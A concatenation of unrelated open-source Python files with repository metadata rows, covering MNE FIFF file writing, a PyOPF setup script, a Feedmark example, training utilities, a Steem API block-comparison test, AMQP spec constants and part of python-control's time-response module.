logger.debug('Writing using gzip')
# defaults to compression level 9, which is barely smaller but much
# slower. 2 offers a good compromise.
fid = GzipFile(fname, "wb", compresslevel=2)
else:
logger.debug('Writing using normal I/O')
fid = open(fname, "wb")
else:
logger.debug('Writing using %s I/O' % type(fname))
fid = fname
fid.seek(0)
# Write the compulsory items
write_id(fid, FIFF.FIFF_FILE_ID, id_)
write_int(fid, FIFF.FIFF_DIR_POINTER, -1)
write_int(fid, FIFF.FIFF_FREE_LIST, -1)
return fid
def check_fiff_length(fid, close=True):
"""Ensure our file hasn't grown too large to work properly."""
if fid.tell() > 2147483648: # 2 ** 31, FIFF uses signed 32-bit locations
if close:
fid.close()
raise IOError('FIFF file exceeded 2GB limit, please split file or '
'save to a different format')
def end_file(fid):
"""Write the closing tags to a fif file and closes the file."""
write_nop(fid, last=True)
check_fiff_length(fid)
fid.close()
def write_coord_trans(fid, trans):
"""Write a coordinate transformation structure."""
data_size = 4 * 2 * 12 + 4 * 2
fid.write(np.array(FIFF.FIFF_COORD_TRANS, dtype='>i4').tostring())
fid.write(np.array(FIFF.FIFFT_COORD_TRANS_STRUCT, dtype='>i4').tostring())
fid.write(np.array(data_size, dtype='>i4').tostring())
fid.write(np.array(FIFF.FIFFV_NEXT_SEQ, dtype='>i4').tostring())
fid.write(np.array(trans['from'], dtype='>i4').tostring())
fid.write(np.array(trans['to'], dtype='>i4').tostring())
# The transform...
rot = trans['trans'][:3, :3]
move = trans['trans'][:3, 3]
fid.write(np.array(rot, dtype='>f4').tostring())
fid.write(np.array(move, dtype='>f4').tostring())
# ...and its inverse
trans_inv = linalg.inv(trans['trans'])
rot = trans_inv[:3, :3]
move = trans_inv[:3, 3]
fid.write(np.array(rot, dtype='>f4').tostring())
fid.write(np.array(move, dtype='>f4').tostring())
def write_ch_info(fid, ch):
"""Write a channel information record to a fif file."""
data_size = 4 * 13 + 4 * 7 + 16
fid.write(np.array(FIFF.FIFF_CH_INFO, dtype='>i4').tostring())
fid.write(np.array(FIFF.FIFFT_CH_INFO_STRUCT, dtype='>i4').tostring())
fid.write(np.array(data_size, dtype='>i4').tostring())
fid.write(np.array(FIFF.FIFFV_NEXT_SEQ, dtype='>i4').tostring())
# Start writing fiffChInfoRec
fid.write(np.array(ch['scanno'], dtype='>i4').tostring())
fid.write(np.array(ch['logno'], dtype='>i4').tostring())
fid.write(np.array(ch['kind'], dtype='>i4').tostring())
fid.write(np.array(ch['range'], dtype='>f4').tostring())
fid.write(np.array(ch['cal'], dtype='>f4').tostring())
fid.write(np.array(ch['coil_type'], dtype='>i4').tostring())
fid.write(np.array(ch['loc'], dtype='>f4').tostring()) # writing 12 values
# unit and unit multiplier
fid.write(np.array(ch['unit'], dtype='>i4').tostring())
fid.write(np.array(ch['unit_mul'], dtype='>i4').tostring())
# Finally channel name
ch_name = ch['ch_name'][:15]
fid.write(np.array(ch_name, dtype='>c').tostring())
fid.write(b('\0') * (16 - len(ch_name)))
def write_dig_points(fid, dig, block=False, coord_frame=None):
"""Write a set of digitizer data points into a fif file."""
if dig is not None:
data_size = 5 * 4
if block:
start_block(fid, FIFF.FIFFB_ISOTRAK)
if coord_frame is not None:
write_int(fid, FIFF.FIFF_MNE_COORD_FRAME, coord_frame)
for d in dig:
fid.write(np.array(FIFF.FIFF_DIG_POINT, '>i4').tostring())
fid.write(np.array(FIFF.FIFFT_DIG_POINT_STRUCT, '>i4').tostring())
fid.write(np.array(data_size, dtype='>i4').tostring())
fid.write(np.array(FIFF.FIFFV_NEXT_SEQ, '>i4').tostring())
# Start writing fiffDigPointRec
fid.write(np.array(d['kind'], '>i4').tostring())
fid.write(np.array(d['ident'], '>i4').tostring())
fid.write(np.array(d['r'][:3], '>f4').tostring())
if block:
end_block(fid, FIFF.FIFFB_ISOTRAK)
def write_float_sparse_rcs(fid, kind, mat):
"""Write a single-precision sparse compressed row matrix tag."""
return write_float_sparse(fid, kind, mat, fmt='csr')
def write_float_sparse_ccs(fid, kind, mat):
"""Write a single-precision sparse compressed column matrix tag."""
return write_float_sparse(fid, kind, mat, fmt='csc')
def write_float_sparse(fid, kind, mat, fmt='auto'):
"""Write a single-precision floating-point sparse matrix tag."""
from .tag import _matrix_coding_CCS, _matrix_coding_RCS
if fmt == 'auto':
fmt = 'csr' if isinstance(mat, sparse.csr_matrix) else 'csc'
if fmt == 'csr':
need = sparse.csr_matrix
bits = _matrix_coding_RCS
else:
need = sparse.csc_matrix
bits = _matrix_coding_CCS
if not isinstance(mat, need):
raise TypeError('Must write %s, got %s' % (fmt.upper(), type(mat),))
FIFFT_MATRIX = bits << 16
FIFFT_MATRIX_FLOAT_RCS = FIFF.FIFFT_FLOAT | FIFFT_MATRIX
nnzm = mat.nnz
nrow = mat.shape[0]
data_size = 4 * nnzm + 4 * nnzm + 4 * (nrow + 1) + 4 * 4
fid.write(np.array(kind, dtype='>i4').tostring())
fid.write(np.array(FIFFT_MATRIX_FLOAT_RCS, dtype='>i4').tostring())
fid.write(np.array(data_size, dtype='>i4').tostring())
fid.write(np.array(FIFF.FIFFV_NEXT_SEQ, dtype='>i4').tostring())
fid.write(np.array(mat.data, dtype='>f4').tostring())
fid.write(np.array(mat.indices, dtype='>i4').tostring())
fid.write(np.array(mat.indptr, dtype='>i4').tostring())
dims = [nnzm, mat.shape[0], mat.shape[1], 2]
fid.write(np.array(dims, dtype='>i4').tostring())
check_fiff_length(fid)
def _generate_meas_id():
"""Generate a new meas_id dict."""
id_ = dict()
id_['version'] = FIFF.FIFFC_VERSION
id_['machid'] = get_machid()
id_['secs'], id_['usecs'] = _date_now()
return id_
def _date_now():
"""Get date in secs, usecs."""
now = time.time()
# Get date in secs/usecs (as in `fill_measurement_info` in
# mne/forward/forward.py)
date_arr = np.array([np.floor(now), 1e6 * (now - np.floor(now))],
dtype='int32')
return date_arr
| 34.803279 | 79 | 0.630913 |
123f5cb869d204c260fcd85b06de56c91146ed32 | 2,180 | py | Python | setup.py | marcoscleison/PyOPF | f386c90e63b4f2c46c6d5305f261b6b6619df69f | [
"Apache-2.0"
] | 3 | 2019-05-06T14:43:32.000Z | 2019-09-03T18:20:33.000Z | setup.py | marcoscleison/PyOPF | f386c90e63b4f2c46c6d5305f261b6b6619df69f | [
"Apache-2.0"
] | 2 | 2019-05-06T17:42:59.000Z | 2019-06-26T14:35:00.000Z | setup.py | marcoscleison/PyOPF | f386c90e63b4f2c46c6d5305f261b6b6619df69f | [
"Apache-2.0"
] | null | null | null | """
Copyright 2019 PyOPF Contributors
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from setuptools import setup
import sys
import subprocess
import os
from distutils.core import setup, Extension
from setuptools import setup, find_packages
from distutils.core import setup, Extension
from distutils import sysconfig
import pybind11
class get_pybind_include(object):
"""Helper class to determine the pybind11 include path
The purpose of this class is to postpone importing pybind11
until it is actually installed, so that the ``get_include()``
method can be invoked. """
def __init__(self, user=False):
try:
import pybind11
except ImportError:
if subprocess.call([sys.executable, '-m', 'pip', 'install', 'pybind11']):
raise RuntimeError('pybind11 install failed.')
self.user = user
def __str__(self):
import pybind11
return pybind11.get_include(self.user)
cpp_args = ['-std=c++1y', '-O3', '-fopenmp', '-Wall']
link_args= ['-fopenmp']
ext_modules = [
Extension(
'pyopf_native',
['pyopf_native_/src/pyopf_native.cpp'],
language='c++',
extra_compile_args = cpp_args,
extra_link_args = link_args
),
]
pybind_includes = [pybind11.get_include(), pybind11.get_include(True)]
# 'pybind11/include',
setup(
name='pyopf',
version='0.0.1',
include_dirs=['pyopf_native_/include', 'pyopf_native_/LibOPFcpp/include'] + pybind_includes,
author='Marcos Cleison and Contributors',
author_email='marcoscleison.unit@gmail.com',
description='Python bind for libOPFcpp',
ext_modules=ext_modules,
packages=['pyopf']
)
| 29.066667 | 96 | 0.705505 |
2ab323ae580625cfd641b6a95439c169381380dd | 1,576 | py | Python | eg/table-of-contents.py | catseye/Feedmark | 4fc7668f7baf40870661fe7f01a2065d6c010005 | [
"MIT"
] | null | null | null | eg/table-of-contents.py | catseye/Feedmark | 4fc7668f7baf40870661fe7f01a2065d6c010005 | [
"MIT"
] | null | null | null | eg/table-of-contents.py | catseye/Feedmark | 4fc7668f7baf40870661fe7f01a2065d6c010005 | [
"MIT"
] | 1 | 2020-05-14T08:01:39.000Z | 2020-05-14T08:01:39.000Z | #
# Example of a Python script that creates a table of contents from
# the JSON extracted by feedmark from a set of Feedmark documents.
#
import json
import re
import subprocess
import sys
import urllib
def generate_toc_line(document):
title = document['title']
filename = urllib.quote(document['filename'])
sections = document.get('sections', [])
properties = document.get('properties', {})
# You may wish to display some information after each entry in the ToC. Here are some examples.
signs = []
# Display a count of the sections in the document.
section_count = len(sections)
signs.append('({})'.format(section_count))
# Display (U) if the document is under construction.
if properties.get('status') == 'under construction':
signs.append('*(U)*')
# Display the year of publication, if the document provides a publication-date.
if properties.get('publication-date'):
pubdate = properties['publication-date']
match = re.search(r'(\w+\s+\d\d\d\d)', pubdate)
if match:
pubdate = match.group(1)
signs.append('({})'.format(pubdate))
return "* [{}]({}) {}\n".format(title, filename, ' '.join(signs))
def output_toc(filenames):
data = json.loads(subprocess.check_output(["feedmark", "--output-json"] + filenames))
for document in data['documents']:
line = generate_toc_line(document)
sys.stdout.write(line)
if __name__ == '__main__':
output_toc([
'Recent Llama Sightings.md',
'Ancient Llama Sightings.md',
])
| 29.735849 | 100 | 0.653553 |
2be22a0a3bce3aabf451c6c8336e908a42ec7376 | 1,650 | py | Python | utils.py | YilinLiu97/AmygNet-Pytorch | d5bb244fd930791345d38f09870a7ded633f4622 | [
"MIT"
] | 3 | 2019-06-11T01:38:34.000Z | 2020-04-16T00:36:10.000Z | utils.py | YilinLiu97/Amygdala-Net | d5bb244fd930791345d38f09870a7ded633f4622 | [
"MIT"
] | null | null | null | utils.py | YilinLiu97/Amygdala-Net | d5bb244fd930791345d38f09870a7ded633f4622 | [
"MIT"
] | null | null | null | import numpy as np
class AverageMeter(object):
"""Computes and stores the average and current value"""
def __init__(self):
self.reset()
def reset(self):
self.val = 0
self.avg = 0
self.sum = 0
self.count = 0
def update(self, val, n=1):
self.val = val
self.sum += val * n
self.count += n
self.avg = self.sum / self.count
class WeightEMA(object):
def __init__(self, model, tea_model):
self.model = model
self.tea_model = tea_model
self.params = list(model.parameters())
self.tea_params = list(tea_model.parameters())
# for p,t_p in zip(self.params, self.tea_params):
# t_p.data[:] = p.data[:]
def step(self,alpha,global_step):
# alpha = min(1 - 1 / (global_step + 1), alpha)
for t_p,p in zip(self.tea_params, self.params):
# print('t_p: ', t_p)
t_p.data.mul_(alpha)
t_p.data.add_((1.0-alpha)*p.data)
# print('p: ', p)
# print('(after) t_p: ', t_p)
def sigmoid_rampup(current, rampup_length):
if rampup_length == 0:
return 1.0
else:
current = np.clip(current, 0.0, rampup_length)
phase = 1.0 - current / rampup_length
return float(np.exp(-5.0*phase*phase))
def get_current_consistency_weight(weight, epoch, rampup):
out = weight * sigmoid_rampup(epoch, rampup)
print('Consistency_weight: ', out)
return out
def weight_schedule(epoch, max_epochs, max_val, mult, n_labeled, n_samples):
max_val = max_val * (float(n_labeled) / n_samples)
return ramp_up(epoch, max_epochs, max_val, mult)
| 28.448276 | 76 | 0.603636 |
9fda6bfcb68d1b67a6c1ee26cd214b8d9a8f4641 | 5,264 | py | Python | python_scripts/tests/api_tests/test_ah_get_ops_in_block.py | ZhengGuoDeveloper/steem | c6d6f0687879b47f97ce786b049d3d8bfc6d1c35 | [
"MIT"
] | 2,189 | 2016-04-02T21:49:13.000Z | 2022-03-31T23:31:07.000Z | python_scripts/tests/api_tests/test_ah_get_ops_in_block.py | ZhengGuoDeveloper/steem | c6d6f0687879b47f97ce786b049d3d8bfc6d1c35 | [
"MIT"
] | 2,798 | 2016-04-11T18:01:05.000Z | 2022-01-15T23:05:39.000Z | python_scripts/tests/api_tests/test_ah_get_ops_in_block.py | ZhengGuoDeveloper/steem | c6d6f0687879b47f97ce786b049d3d8bfc6d1c35 | [
"MIT"
] | 908 | 2016-03-23T18:26:20.000Z | 2022-03-07T21:43:27.000Z | #!/usr/bin/env python3
"""
Usage: script_name jobs url1 url2 [wdir [last_block [first_block]]]
Example: script_name 4 http://127.0.0.1:8090 http://127.0.0.1:8091 ./ 5000000 0
set jobs to 0 if you want use all processors
if last_block == 0, it is read from url1 (as reference)
"""
import sys
import json
import os
import shutil
from jsonsocket import JSONSocket
from jsonsocket import steemd_call
from concurrent.futures import ThreadPoolExecutor
from concurrent.futures import ProcessPoolExecutor
from concurrent.futures import Future
from concurrent.futures import wait
from pathlib import Path
wdir = Path()
errors = 0
def main():
if len(sys.argv) < 4 or len(sys.argv) > 7:
print("Usage: script_name jobs url1 url2 [wdir [last_block [first_block]]]")
print(" Example: script_name 4 http://127.0.0.1:8090 http://127.0.0.1:8091 ./ 5000000 0")
print( " set jobs to 0 if you want use all processors" )
print(" if last_block == 0, it is read from url1 (as reference)")
exit()
global wdir
global errors
first_block = 0
last_block = 0
jobs = int(sys.argv[1])
if jobs <= 0:
import multiprocessing
jobs = multiprocessing.cpu_count()
url1 = sys.argv[2]
url2 = sys.argv[3]
if len(sys.argv) > 4:
wdir = Path(sys.argv[4])
if len(sys.argv) > 5:
last_block = int(sys.argv[5])
else:
last_block = 0
if len(sys.argv) == 7:
first_block = int(sys.argv[6])
else:
first_block = 0
last_block1 = get_last_block(url1)
last_block2 = get_last_block(url2)
if last_block1 != last_block2:
exit("last block of {} ({}) is different then last block of {} ({})".format(url1, last_block1, url2, last_block2))
if last_block == 0:
last_block = last_block1
elif last_block != last_block1:
print("WARNING: last block from cmdline {} is different then from {} ({})".format(last_block, url1, last_block1))
if last_block == 0:
exit("last block cannot be 0!")
create_wdir()
blocks = last_block - first_block + 1
if jobs > blocks:
jobs = blocks
print("setup:")
print(" jobs: {}".format(jobs))
print(" url1: {}".format(url1))
print(" url2: {}".format(url2))
print(" wdir: {}".format(wdir))
print(" block range: {}:{}".format(first_block, last_block))
if jobs > 1:
blocks_per_job = blocks // jobs
with ProcessPoolExecutor(max_workers=jobs) as executor:
for i in range(jobs-1):
executor.submit(compare_results, first_block, (first_block + blocks_per_job - 1), url1, url2)
first_block = first_block + blocks_per_job
executor.submit(compare_results, first_block, last_block, url1, url2)
else:
compare_results(first_block, last_block, url1, url2)
exit( errors )
def create_wdir():
global wdir
if wdir.exists():
if wdir.is_file():
os.remove(wdir)
if wdir.exists() == False:
wdir.mkdir(parents=True)
def get_last_block(url, max_tries=10, timeout=0.1):
request = bytes( json.dumps( {
"jsonrpc": "2.0",
"id": 0,
"method": "database_api.get_dynamic_global_properties",
"params": {}
} ), "utf-8" ) + b"\r\n"
status, response = steemd_call(url, data=request, max_tries=max_tries, timeout=timeout)
if status == False:
return 0
try:
return response["result"]["head_block_number"]
except:
return 0
def compare_results(f_block, l_block, url1, url2, max_tries=10, timeout=0.1):
global wdir
global errors
print( "Compare blocks [{} : {}]".format(f_block, l_block) )
for i in range(f_block, l_block+1):
request = bytes( json.dumps( {
"jsonrpc": "2.0",
"id": i,
"method": "account_history_api.get_ops_in_block",
"params": { "block_num": i, "only_virtual": False }
} ), "utf-8" ) + b"\r\n"
with ThreadPoolExecutor(max_workers=2) as executor:
#with ProcessPoolExecutor(max_workers=2) as executor:
future1 = executor.submit(steemd_call, url1, data=request, max_tries=max_tries, timeout=timeout)
future2 = executor.submit(steemd_call, url2, data=request, max_tries=max_tries, timeout=timeout)
status1, json1 = future1.result()
status2, json2 = future2.result()
#status1, json1 = steemd_call(url1, data=request, max_tries=max_tries, timeout=timeout)
#status2, json2 = steemd_call(url2, data=request, max_tries=max_tries, timeout=timeout)
if status1 == False or status2 == False or json1 != json2:
print("Difference @block: {}\n".format(i))
errors += 1
filename = wdir / Path(str(f_block) + "_" + str(l_block) + ".log")
try: file = filename.open( "w" )
except: print( "Cannot open file:", filename ); return
file.write("Difference @block: {}\n".format(i))
file.write("{} response:\n".format(url1))
json.dump(json1, file, indent=2, sort_keys=True)
file.write("\n")
file.write("{} response:\n".format(url2))
json.dump(json2, file, indent=2, sort_keys=True)
file.write("\n")
file.close()
print( "Compare blocks [{} : {}] break with error".format(f_block, l_block) )
return
print( "Compare blocks [{} : {}] finished".format(f_block, l_block) )
if __name__ == "__main__":
main()
| 29.407821 | 118 | 0.647226 |
2518e4d0d7d622ed15ecf5e332e9ea29a799908d | 2,178 | py | Python | desktop/core/ext-py/amqp-2.4.1/amqp/spec.py | maulikjs/hue | 59ac879b55bb6fb26ecb4e85f4c70836fc21173f | [
"Apache-2.0"
] | 5,079 | 2015-01-01T03:39:46.000Z | 2022-03-31T07:38:22.000Z | desktop/core/ext-py/amqp-2.4.1/amqp/spec.py | zks888/hue | 93a8c370713e70b216c428caa2f75185ef809deb | [
"Apache-2.0"
] | 1,623 | 2015-01-01T08:06:24.000Z | 2022-03-30T19:48:52.000Z | desktop/core/ext-py/amqp-2.4.1/amqp/spec.py | zks888/hue | 93a8c370713e70b216c428caa2f75185ef809deb | [
"Apache-2.0"
] | 2,033 | 2015-01-04T07:18:02.000Z | 2022-03-28T19:55:47.000Z | """AMQP Spec."""
from __future__ import absolute_import, unicode_literals
from collections import namedtuple
method_t = namedtuple('method_t', ('method_sig', 'args', 'content'))
def method(method_sig, args=None, content=False):
"""Create amqp method specification tuple."""
return method_t(method_sig, args, content)
class Connection:
"""AMQ Connection class."""
CLASS_ID = 10
Start = (10, 10)
StartOk = (10, 11)
Secure = (10, 20)
SecureOk = (10, 21)
Tune = (10, 30)
TuneOk = (10, 31)
Open = (10, 40)
OpenOk = (10, 41)
Close = (10, 50)
CloseOk = (10, 51)
Blocked = (10, 60)
Unblocked = (10, 61)
class Channel:
"""AMQ Channel class."""
CLASS_ID = 20
Open = (20, 10)
OpenOk = (20, 11)
Flow = (20, 20)
FlowOk = (20, 21)
Close = (20, 40)
CloseOk = (20, 41)
class Exchange:
"""AMQ Exchange class."""
CLASS_ID = 40
Declare = (40, 10)
DeclareOk = (40, 11)
Delete = (40, 20)
DeleteOk = (40, 21)
Bind = (40, 30)
BindOk = (40, 31)
Unbind = (40, 40)
UnbindOk = (40, 51)
class Queue:
"""AMQ Queue class."""
CLASS_ID = 50
Declare = (50, 10)
DeclareOk = (50, 11)
Bind = (50, 20)
BindOk = (50, 21)
Purge = (50, 30)
PurgeOk = (50, 31)
Delete = (50, 40)
DeleteOk = (50, 41)
Unbind = (50, 50)
UnbindOk = (50, 51)
class Basic:
"""AMQ Basic class."""
CLASS_ID = 60
Qos = (60, 10)
QosOk = (60, 11)
Consume = (60, 20)
ConsumeOk = (60, 21)
Cancel = (60, 30)
CancelOk = (60, 31)
Publish = (60, 40)
Return = (60, 50)
Deliver = (60, 60)
Get = (60, 70)
GetOk = (60, 71)
GetEmpty = (60, 72)
Ack = (60, 80)
Nack = (60, 120)
Reject = (60, 90)
RecoverAsync = (60, 100)
Recover = (60, 110)
RecoverOk = (60, 111)
class Confirm:
"""AMQ Confirm class."""
CLASS_ID = 85
Select = (85, 10)
SelectOk = (85, 11)
class Tx:
"""AMQ Tx class."""
CLASS_ID = 90
Select = (90, 10)
SelectOk = (90, 11)
Commit = (90, 20)
CommitOk = (90, 21)
Rollback = (90, 30)
RollbackOk = (90, 31)
| 17.707317 | 68 | 0.52663 |
3f3eacc271d902d8a908677b96194569fa02bd7b | 80,193 | py | Python | control/timeresp.py | berezhko/python-control | 78ec3eedd5a4a5f3d8409eec7c7f7e787793b357 | [
"BSD-3-Clause"
] | 1,112 | 2015-01-14T08:01:33.000Z | 2022-03-31T11:54:00.000Z | control/timeresp.py | berezhko/python-control | 78ec3eedd5a4a5f3d8409eec7c7f7e787793b357 | [
"BSD-3-Clause"
] | 646 | 2015-02-02T15:35:23.000Z | 2022-03-30T08:19:26.000Z | control/timeresp.py | berezhko/python-control | 78ec3eedd5a4a5f3d8409eec7c7f7e787793b357 | [
"BSD-3-Clause"
] | 366 | 2015-01-28T17:58:06.000Z | 2022-03-29T11:04:10.000Z | """
timeresp.py - time-domain simulation routines.
The :mod:`~control.timeresp` module contains a collection of
functions that are used to compute time-domain simulations of LTI
systems.
Arguments to time-domain simulations include a time vector, an input
vector (when needed), and an initial condition vector. The most
general function for simulating LTI systems the
:func:`forced_response` function, which has the form::
t, y = forced_response(sys, T, U, X0)
where `T` is a vector of times at which the response should be
evaluated, `U` is a vector of inputs (one for each time point) and
`X0` is the initial condition for the system.
See :ref:`time-series-convention` for more information on how time
series data are represented.
Copyright (c) 2011 by California Institute of Technology
All rights reserved.
Copyright (c) 2011 by Eike Welk
Copyright (c) 2010 by SciPy Developers
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions
are met:
1. Redistributions of source code must retain the above copyright
notice, this list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
3. Neither the name of the California Institute of Technology nor
the names of its contributors may be used to endorse or promote
products derived from this software without specific prior
written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL CALTECH
OR THE CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF
USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT
OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
SUCH DAMAGE.
Initial Author: Eike Welk
Date: 12 May 2011
Modified: Sawyer B. Fuller (minster@uw.edu) to add discrete-time
capability and better automatic time vector creation
Date: June 2020
Modified by Ilhan Polat to improve automatic time vector creation
Date: August 17, 2020
Modified by Richard Murray to add TimeResponseData class
Date: August 2021
$Id$
"""
import warnings
import numpy as np
import scipy as sp
from numpy import einsum, maximum, minimum
from scipy.linalg import eig, eigvals, matrix_balance, norm
from copy import copy
from . import config
from .lti import isctime, isdtime
from .statesp import StateSpace, _convert_to_statespace, _mimo2simo, _mimo2siso
from .xferfcn import TransferFunction
__all__ = ['forced_response', 'step_response', 'step_info',
'initial_response', 'impulse_response', 'TimeResponseData']
class TimeResponseData():
"""A class for returning time responses.
This class maintains and manipulates the data corresponding to the
temporal response of an input/output system. It is used as the return
type for time domain simulations (step response, input/output response,
etc).
A time response consists of a time vector, an output vector, and
optionally an input vector and/or state vector. Inputs and outputs can
be 1D (scalar input/output) or 2D (vector input/output).
A time response can be stored for multiple input signals (called traces),
with the output and state indexed by the trace number. This allows for
input/output response matrices, which is mainly useful for impulse and
step responses for linear systems. For multi-trace responses, the same
time vector must be used for all traces.
Time responses are accessed through either the raw data, stored as
:attr:`t`, :attr:`y`, :attr:`x`, :attr:`u`, or using a set of properties
:attr:`time`, :attr:`outputs`, :attr:`states`, :attr:`inputs`. When
accessing time responses via their properties, squeeze processing is
applied so that (by default) single-input, single-output systems will have
the output and input indices supressed. This behavior is set using the
``squeeze`` keyword.
Attributes
----------
t : 1D array
Time values of the input/output response(s). This attribute is
normally accessed via the :attr:`time` property.
y : 2D or 3D array
Output response data, indexed either by output index and time (for
single trace responses) or output, trace, and time (for multi-trace
responses). These data are normally accessed via the :attr:`outputs`
property, which performs squeeze processing.
x : 2D or 3D array, or None
State space data, indexed either by output number and time (for single
trace responses) or output, trace, and time (for multi-trace
responses). If no state data are present, value is ``None``. These
data are normally accessed via the :attr:`states` property, which
performs squeeze processing.
u : 2D or 3D array, or None
Input signal data, indexed either by input index and time (for single
trace responses) or input, trace, and time (for multi-trace
responses). If no input data are present, value is ``None``. These
data are normally accessed via the :attr:`inputs` property, which
performs squeeze processing.
squeeze : bool, optional
By default, if a system is single-input, single-output (SISO)
then the outputs (and inputs) are returned as a 1D array
(indexed by time) and if a system is multi-input or
multi-output, then the outputs are returned as a 2D array
(indexed by output and time) or a 3D array (indexed by output,
trace, and time). If ``squeeze=True``, access to the output
response will remove single-dimensional entries from the shape
of the inputs and outputs even if the system is not SISO. If
``squeeze=False``, the output is returned as a 2D or 3D array
(indexed by the output [if multi-input], trace [if multi-trace]
and time) even if the system is SISO. The default value can be
set using config.defaults['control.squeeze_time_response'].
transpose : bool, optional
If True, transpose all input and output arrays (for backward
compatibility with MATLAB and :func:`scipy.signal.lsim`). Default
value is False.
issiso : bool, optional
Set to ``True`` if the system generating the data is single-input,
single-output. If passed as ``None`` (default), the input data
will be used to set the value.
ninputs, noutputs, nstates : int
Number of inputs, outputs, and states of the underlying system.
input_labels, output_labels, state_labels : array of str
Names for the input, output, and state variables.
ntraces : int
Number of independent traces represented in the input/output
response. If ntraces is 0 then the data represents a single trace
with the trace index surpressed in the data.
Notes
-----
1. For backward compatibility with earlier versions of python-control,
this class has an ``__iter__`` method that allows it to be assigned
to a tuple with a variable number of elements. This allows the
following patterns to work:
t, y = step_response(sys)
t, y, x = step_response(sys, return_x=True)
When using this (legacy) interface, the state vector is not affected by
the `squeeze` parameter.
2. For backward compatibility with earlier version of python-control,
this class has ``__getitem__`` and ``__len__`` methods that allow the
return value to be indexed:
response[0]: returns the time vector
response[1]: returns the output vector
response[2]: returns the state vector
When using this (legacy) interface, the state vector is not affected by
the `squeeze` parameter.
3. The default settings for ``return_x``, ``squeeze`` and ``transpose``
can be changed by calling the class instance and passing new values:
response(tranpose=True).input
See :meth:`TimeResponseData.__call__` for more information.
"""
def __init__(
self, time, outputs, states=None, inputs=None, issiso=None,
output_labels=None, state_labels=None, input_labels=None,
transpose=False, return_x=False, squeeze=None, multi_trace=False
):
"""Create an input/output time response object.
Parameters
----------
time : 1D array
Time values of the output. Ignored if None.
outputs : ndarray
Output response of the system. This can either be a 1D array
indexed by time (for SISO systems or MISO systems with a specified
input), a 2D array indexed by output and time (for MIMO systems
with no input indexing, such as initial_response or forced
response) or trace and time (for SISO systems with multiple
traces), or a 3D array indexed by output, trace, and time (for
multi-trace input/output responses).
states : array, optional
Individual response of each state variable. This should be a 2D
array indexed by the state index and time (for single trace
systems) or a 3D array indexed by state, trace, and time.
inputs : array, optional
Inputs used to generate the output. This can either be a 1D
array indexed by time (for SISO systems or MISO/MIMO systems
with a specified input), a 2D array indexed either by input and
time (for a multi-input system) or trace and time (for a
single-input, multi-trace response), or a 3D array indexed by
input, trace, and time.
sys : LTI or InputOutputSystem, optional
System that generated the data. If desired, the system used to
generate the data can be stored along with the data.
squeeze : bool, optional
By default, if a system is single-input, single-output (SISO)
then the inputs and outputs are returned as a 1D array (indexed
by time) and if a system is multi-input or multi-output, then
the inputs are returned as a 2D array (indexed by input and
time) and the outputs are returned as either a 2D array (indexed
by output and time) or a 3D array (indexed by output, trace, and
time). If squeeze=True, access to the output response will
remove single-dimensional entries from the shape of the inputs
and outputs even if the system is not SISO. If squeeze=False,
keep the input as a 2D or 3D array (indexed by the input (if
multi-input), trace (if single input) and time) and the output
as a 3D array (indexed by the output, trace, and time) even if
the system is SISO. The default value can be set using
config.defaults['control.squeeze_time_response'].
Other parameters
----------------
input_labels, output_labels, state_labels: array of str, optional
Optional labels for the inputs, outputs, and states, given as a
list of strings matching the appropriate signal dimension.
transpose : bool, optional
If True, transpose all input and output arrays (for backward
compatibility with MATLAB and :func:`scipy.signal.lsim`).
Default value is False.
return_x : bool, optional
If True, return the state vector when enumerating result by
assigning to a tuple (default = False).
multi_trace : bool, optional
If ``True``, then 2D input array represents multiple traces. For
a MIMO system, the ``input`` attribute should then be set to
indicate which trace is being specified. Default is ``False``.
"""
#
# Process and store the basic input/output elements
#
# Time vector
self.t = np.atleast_1d(time)
if self.t.ndim != 1:
raise ValueError("Time vector must be 1D array")
#
# Output vector (and number of traces)
#
self.y = np.array(outputs)
if self.y.ndim == 3:
multi_trace = True
self.noutputs = self.y.shape[0]
self.ntraces = self.y.shape[1]
elif multi_trace and self.y.ndim == 2:
self.noutputs = 1
self.ntraces = self.y.shape[0]
elif not multi_trace and self.y.ndim == 2:
self.noutputs = self.y.shape[0]
self.ntraces = 0
elif not multi_trace and self.y.ndim == 1:
self.noutputs = 1
self.ntraces = 0
# Reshape the data to be 2D for consistency
self.y = self.y.reshape(self.noutputs, -1)
else:
raise ValueError("Output vector is the wrong shape")
# Check and store labels, if present
self.output_labels = _process_labels(
output_labels, "output", self.noutputs)
# Make sure time dimension of output is the right length
if self.t.shape[-1] != self.y.shape[-1]:
raise ValueError("Output vector does not match time vector")
#
# State vector (optional)
#
# If present, the shape of the state vector should be consistent
# with the multi-trace nature of the data.
#
if states is None:
self.x = None
self.nstates = 0
else:
self.x = np.array(states)
self.nstates = self.x.shape[0]
# Make sure the shape is OK
if multi_trace and \
(self.x.ndim != 3 or self.x.shape[1] != self.ntraces) or \
not multi_trace and self.x.ndim != 2 :
raise ValueError("State vector is the wrong shape")
# Make sure time dimension of state is the right length
if self.t.shape[-1] != self.x.shape[-1]:
raise ValueError("State vector does not match time vector")
